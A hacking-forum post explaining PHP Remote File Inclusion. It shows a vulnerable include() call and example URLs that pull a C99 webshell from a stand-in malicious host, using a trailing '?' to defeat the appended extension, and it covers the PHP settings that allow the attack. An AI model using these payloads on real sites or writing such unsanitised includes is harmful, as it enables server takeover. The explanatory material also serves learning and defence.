Log in

I forgot my password

Search
 
 

Display results as :
 


Rechercher Advanced Search

Keywords

Latest topics
» IRC Server: IRC.HackersPlanet.Org
Mon Jul 18, 2011 5:28 am by JeSTeR

» Getting Someone's IP By One Single Link Click
Sat Nov 20, 2010 4:02 pm by TR0J4NX

» Request Info
Wed Sep 16, 2009 11:33 pm by JeSTeR

» winagent.exe
Mon Aug 31, 2009 9:13 pm by JeSTeR

» sissiBOT.exe
Mon Aug 31, 2009 8:42 pm by JeSTeR

» Posting Rules
Mon Aug 31, 2009 8:30 pm by JeSTeR

» There Are Hidden Posts Only Members Can Access
Sat Aug 22, 2009 10:05 pm by JeSTeR

» Rules For Posting
Wed Aug 19, 2009 6:35 pm by Shikamaru

» RootKit Downloads
Sat Jul 11, 2009 9:34 pm by JeSTeR

Most active topic starters
JeSTeR
 
Admin
 
Shikamaru
 
TR0J4NX
 

Navigation
 Portal
 Index
 Memberlist
 Profile
 FAQ
 Search
Social bookmarking

Social bookmarking digg  Social bookmarking delicious  Social bookmarking reddit  Social bookmarking stumbleupon  Social bookmarking slashdot  Social bookmarking yahoo  Social bookmarking google  Social bookmarking blogmarks  Social bookmarking live      

Bookmark and share the address of H4CK3D.US on your social bookmarking website

Bookmark and share the address of H4CK3D.US on your social bookmarking website

RSS feeds


Yahoo! 
MSN 
AOL 
Netvibes 
Bloglines 



Remote File Inclusion

Go down

Remote File Inclusion

Post  JeSTeR on Thu Jan 08, 2009 2:18 pm

Remote File Inclusion attacks allow malicious users to run their own PHP code on a vulnerable website. The attacker is allowed to include his own (malicious) code in the space provided for PHP programs on a web page. For instance, a piece of vulnerable PHP code would look like this:

include($page . '.php');

This line of PHP code, is then used in URLs like the following example:

http://www.vulnerable.example.org/index.php?page=archive

Because the $page variable is not specifically defined, an attacker can insert the location of a malicious file into the URL and execute it on the target server as in this example:

http://www.vulnerable.example.org/index.php?page=http://www.malicious.example.com/C99.php?

The include() function above instructs the server to retrieve C99.php from the remote server and run its code. This is possible because PHP allows the user to load both remote and local content with the same functions. The code sample above does not perform any checks on the content of the $page variable, it blindly passes it to the function. Because the original piece of code appended .php to the file it would try to fetch the following URL

http://www.malicious.example.com/C99.php.php

As the attackers can not know what the original code might append, they put a question mark at the end of the URLs. This makes the script fetch the intended file, with the appended string as a parameter (which is ignored by the attackers script):

http://www.malicious.example.com/C99.php?.php

This allows the attacker to include any remote file of his choice simply by editing the URL. Attackers commonly include a malicious PHP script called a webshell, also known as a PHP shell. A webshell can display the files and folders on the server and can edit, add or delete files, among other tasks. Scripts that send Spam are also very common. Potentially, the attacker could even use the webshell to gain administrator-level, or root, access on the server.

Why the attack works

RFI attacks are possible because of several PHP configuration flags:

* One is called register_globals. register_globals automatically defines variables in the script that are entered in the page URL. In this example, the $page variable will automatically be filled with http://malicious.code.com/C99.txt?archive.php before the script is executed. Because of this security vulnerability, register_globals is set to OFF by default on newer servers.
* Another one, even more relevant to this attack, is allow_url_fopen. This defines if PHP should be able to fetch remote content in almost any function that takes a filename as a parameter. In PHP 5.2 this setting was separated for the include() family of functions and called allow_url_include. This specifically addresses the fact that the attack described here makes up the majority of security holes in current PHP software.
avatar
JeSTeR
Admin

Age : 35
Posts : 133
Join date : 2008-09-27
Location : Earth

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum